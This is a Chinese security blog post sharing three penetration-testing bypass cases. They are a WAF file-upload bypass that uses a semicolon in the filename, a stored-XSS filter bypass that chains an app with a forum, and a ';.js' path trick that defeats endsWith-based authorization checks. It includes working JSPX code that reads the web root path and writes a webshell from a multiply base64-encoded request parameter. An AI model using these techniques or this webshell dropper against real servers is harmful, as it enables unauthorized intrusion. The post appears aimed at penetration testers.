三个bypass案例分享

最新推荐文章于 2023-09-15 06:00:16 发布
最新推荐文章于 2023-09-15 06:00:16 发布
阅读量725 收藏
点赞数 1
分类专栏: 安全 技术分享 文章标签: 服务器 java 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33942040/article/details/128528698
版权

首发:土司论坛

案例1 文件上传

waf bypass内容校验+后缀校验
已具备条件:
上传处可上传任意类型的文件,但是平台存在waf,直接上传会被拦截

bypass后缀校验

利用原理:利用服务器解析rfc和waf解析rfc的差异性进行bypass。
waf解析的rfc格式为获取所有filename字段内容
因此利用;分割符号使服务器的rfc解析获取到的为jspx 而waf获取的为.jspx;即可绕过
因为服务器组件解析获取到;时会停止解析后面的内容
同理以前过某服的waf 也是同样的这个原理
格式:

filename=1.jsp
z
c

如下
正常传一个jpg
image.png
改为后缀为jsp 直接被拦
image.png
双写filename 先将filename="1.txt"放在后面看看waf是怎样获取格式的 发觉被拦截

放在前面 且删除双引号
也是被拦截

尝试将其均改为txt 可进行上传
因此猜测 waf是直接获取的所有的filename字段,然后取后缀是否为jsp或者jspx即 webshell的后缀,且跟双引号无关

因此猜测利用jspx;这种方式时waf取的后缀为jspx;
进行尝试 与猜测中相同 直接bypass后缀校验


内容绕过:
这个案例倒不是我写的了 之前在先知里面看到的一种手法,这里也是利用其进行绕掉了
上传jspx
然后访问获取绝对路径,这里的test.jsp改为服务器已经存在的

1.jspx

<hi xmlns:hi="http://java.sun.com/JSP/Page">
    <hi:scriptlet>
        String path = application.getRealPath("test.jsp");
        out.println(path);
    </hi:scriptlet>
</hi>

获取到绝对路径后 在利用 上传上去后 如test.jspx?x=6base64编码的webshell 根据waf强度自己改多少次base64
下面这个写马

<hi xmlns:hi="http://java.sun.com/JSP/Page">
    <hi:directive.page import="java.util.Base64,java.io.*"/>
    <hi:scriptlet>
        File file = new File("绝对路径+webshell的名字");
        FileWriter fileOut = new FileWriter(file);
        Base64.Decoder base64 = Base64.getDecoder();
        byte[] str = base64.decode(base64.decode(base64.decode(base64.decode(base64.decode(base64.decode(request.getParameter("x").getBytes("utf-8")))))));
        try {
            fileOut.write(new String(str, "utf-8"));
            out.println("写入成功");
        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            try {
                if (fileOut != null) {
                    fileOut.close();
                }
        } catch (Exception e) {
                e.printStackTrace();
            }
        }
    </hi:scriptlet>
</hi>

最后也是成功写入,成功获取webshell

案例2 存储xss bypass

apk+论坛联动+unicode编码未禁用导致存储xss bypass

产生原理:
1.app中过滤禁用了事件属性,但是没禁用标签
2.手机apk的数据会同步到web网站数据中
3.web网站中 实体编码了标签,但是没禁用事件属性,如onerror等事件属性,且实体unicode编码未禁用 进而组合可进行绕过

具体如下:
①手机app发一个帖子具有

②web网站中
找到刚才同步过去的帖子点击进行编辑

编辑输入实体编码 如下

然后点击发布即可 弹弹弹 弹走鱼尾纹

案例3 权限校验绕过

;符号绕过鉴权

原理:
requesturi+endswith进行鉴权判断,进而导致权限被绕过
由于requesturi获取路由会把所有的路由均取进来因此可能会导致绕过

具体案例:
找了一圈有图的,找了个审计的 这个是审计出的,也有存黑盒绕过出了的 但是因为图片缺少的原因 所以还是采用这个给大家分享

分享这个案例的原因是因为
结合这个案例
我们在对java语言项目做渗透测试的时候
有时候可以考虑在.do或者.action 或者.jsp后面添加;.js或者;.css这种路径 说不定会产生不一样的惊喜
当然啦 …/…/+js路由这种手法和//这两种也可以进行测试 也有可能遇到不一样的惊喜

goddemon
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
记一次Emotet木马处理案例
06-30 971
0x00、前言 用户的安全意识相对薄弱,面对来历不明的链接和附件,容易被诱导从而遭受木马的入侵。在日常使用过程中,有时电脑中病毒后会遇到木马查杀不掉的情况,应该是如何处理呢?下面分享一个Emotet木马处理的案例,希望对你有所帮助。 0x01、案例说明 从流量侧监控到多个用户终端频繁发送邮件,涉及大量收件人与发件人并带有附件,疑似感染木马,用户手动杀软查杀无果。 0x02、原因分析 既然杀软无法......
Spark知识点总结
weixin_50528552的博客
03-11 860
Spark知识点总结
临时工说: 云原生数据库别整新名词,bypass ,不就是旁路吗
sql server的专栏
09-15 138
开头还是介绍一下群,如果感兴趣polardb ,mongodb ,mysql ,postgresql ,redis 等有问题,有需求都可以加群群内有各大数据库行业大咖,CTO,可以解决你的问题。加群请联系 liuaustin3 ,在新加的朋友会分到2群(共1300人左右 1 + 2 + 3 + 4) 3群即将突破 400 会关闭自由申请,新人会进4群当越来越活明白的时候,人性的理解要深刻,没有人应...
文件包含漏洞与文件包含Bypass漏洞基础
AzulSystems的博客
03-16 144
以上列出的两大点是文件包含常用姿势,其它很少用的我就不一一列出,因为本文也是自己的学习总结,我觉得像包含session、包含日志、包含environ等等这些姿势很少用到,所以这里不描述,但是我是有印象的,当我以后用到的时候,再回头仔细研究,否则现在学了一遍,很久没用过也是会忘记。通常本地包含都是开着的,因为它是默认开启的,而且很少人会改它。通过PHP的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到攻击的目的。
一个存储型xss的bypass案例
Websec
03-03 2113
翻译: 原文地址:https://medium.com/bugbountywriteup/story-of-a-stored-xss-bypass-26e6659f807b 漏洞类型:存储型xss 作者:Prial Islam Khan …… 最近我在测试一个私人网站,在该网站中,用户可以添加他们的个人信息。我注意到一个名为Secret Key的输入,它允许用户处理付款并将交易信息...
bypass_bypass_
09-29
適用於近期之xccode之過渡偵測方式之檔案
Bypass_WAF_技巧分享.pdf
08-08
• WAF 简介 • WAF 分类 • WAF 识别 • WAF 绕过方式 • Bypass 利用
12306Bypass.zip
04-02
12306Bypass.
Bypass抢票应用程序
最新发布
03-18
抢票应用程序
sqli-bypass靶场
11-10
sqli-bypass靶场
bypass功能介绍
sun007700的专栏
01-06 3299
bypass功能介绍_黄焖榴莲饭的博客-CSDN博客_bypass 硬件bypass原理介绍_weixin_33884611的博客-CSDN博客 Bypass实现的原理分析 上面简单说明了一下Bypass的控制方式,下面针对Bypass工作原理作一下简要的说明,主要从硬件和软件两个层面来分析。以研华的FWA-3140系列产品为研究对象。 硬件层面 在硬件层面上,要实现Bypass,主要使用的就是继电器。这些继电器主要连接两个Bypass网口的各个网口信号线上,下图以其中一根信号线来说明继电器在其..
Bypass功能及原理介绍
热门推荐
Alex_duanjp的专栏
10-12 2万+
<br />版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明<br />http://chenzhuoyou.blogbus.com/logs/35484267.html<br /> <br />网络安全平台厂商往往需要用到一项比较特殊的技术,那就是Bypass,那么到底什么是Bypass呢,Bypass设备又是如何来实现的?下面我就对Bypass技术做一下简单的介绍和说明。<br />  一、 什么是Bypass。<br />  大家知道,网络安全设备一般都是应用在两个或更多的网络之间,比
Kernel bypass技术及其在Ceph中的应用介绍
梦幻之巅
03-15 3553
##Kernel bypass技术及其在Ceph中的应用介绍 ###背景 Ceph是当前最流行的开源分布式统一存储,在一套基础架构中同时支持块存储、对象存储和文件存储,支持PB级别的扩展能力,广泛用于云环境中;Ceph来源于Sage Weil博士一项关于存储系统的PhD研究项目,最初被设计为一个分布式文件系统,整体架构基于低速设备而构建,提供毫秒(ms)级别的IO延迟。 从1956年第一块机械硬盘...
硬件bypass原理介绍
weixin_33884611的博客
04-04 3671
硬件bypass 原理介绍 一 硬件bypass 目的: 作为串接产品为了避免产品的单点故障,在设备出现断电,死机时,不能因为串接产品的不可用而导致用户的网络不可用,硬件Bypass功能已经是流控产品必备功能,在设备断电,死机时能够直接将内,外两个端口物理连通,变成一根网线,这样用户的数据流量可以直接通过设备,而不受设备自身当前状态的影响。 如下图所示,在...
ByPass
AquariusYuxin的博客
11-15 7086
一、 什么是Bypass。 大家知道,网络安全设备一般都是应用在两个或更多的网络之间,比如内网和外网之间,网络安全设备内的应用程序会对通过他的网络封包来进行分析,以判断是否有威胁存在,处理完后再按照一定的路由规则将封包转发出去,而如果这台网络安全设备出现了故障,比如断电或死机后,那连接这台设备上所以网段也就彼此失去联系了,这个时候如果要求各个网络彼此还需要处于连通状态,那么就必须Bypass出面...
网络安全设备Bypass功能介绍及分析
weixin_42414349的博客
10-29 1万+
一、 什么是Bypass。 网络安全设备一般都是应用在两个或更多的网络之间,比如内网和外网之间,网络安全设备内的应用程序会对通过他的网络封包来进行分析,以判断是否有威胁存在,处理完后再按照一定的路由规则将封包转发出去,而如果这台网络安全设备出现了故障,比如断电或死机后,那连接这台设备上所以网段也就彼此失去联系了,这个时候如果要求各个网络彼此还需要处于连通状态,那么就必须Bypa...
内容bypass分享
goddemon
07-25 8284
典型常见的拦截情况 ①直接reset ②能上传成功但拦截url页面 即访问时线上没有该页面 个人理解的waf内容检测原理: waf检测的原理: 动态检测–>检测进程和request和response包居多 静态检测–>强检(检测到某些参数或者内容就直接reset掉)或者是弱检(即一部分敏感然后在给人检测) 这里要绕的一般就是静态检测直接连shell的使用哥斯拉或者冰蝎 冰蝎启动不了 解决方法 https://blog.csdn.net/RABCDXB/article/details/122250489?sp
bypass和非bypass区别
05-18
Bypass和非Bypass是指计算机网络中的两种不同路由方式。 Bypass是一种路由方式,也称为直通式路由。当网络设备(如防火墙、负载均衡器等)出现故障或维护时,通过Bypass可以让网络流量直接绕过这些设备,而不会造成网络中断。Bypass通常是在网络设备的前后各设置一个Bypass插槽,当设备发生故障时,Bypass插槽中的开关会自动切换,使流量直接绕过设备。 非Bypass则是另一种路由方式,也称为非直通式路由。当网络设备出现故障或维护时,非Bypass路由方式会导致网络中断,因为网络流量需要经过设备才能到达目的地。 总之,Bypass路由方式可以在设备故障或维护时保持网络的连通性,而非Bypass路由方式则可能会导致网络中断。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值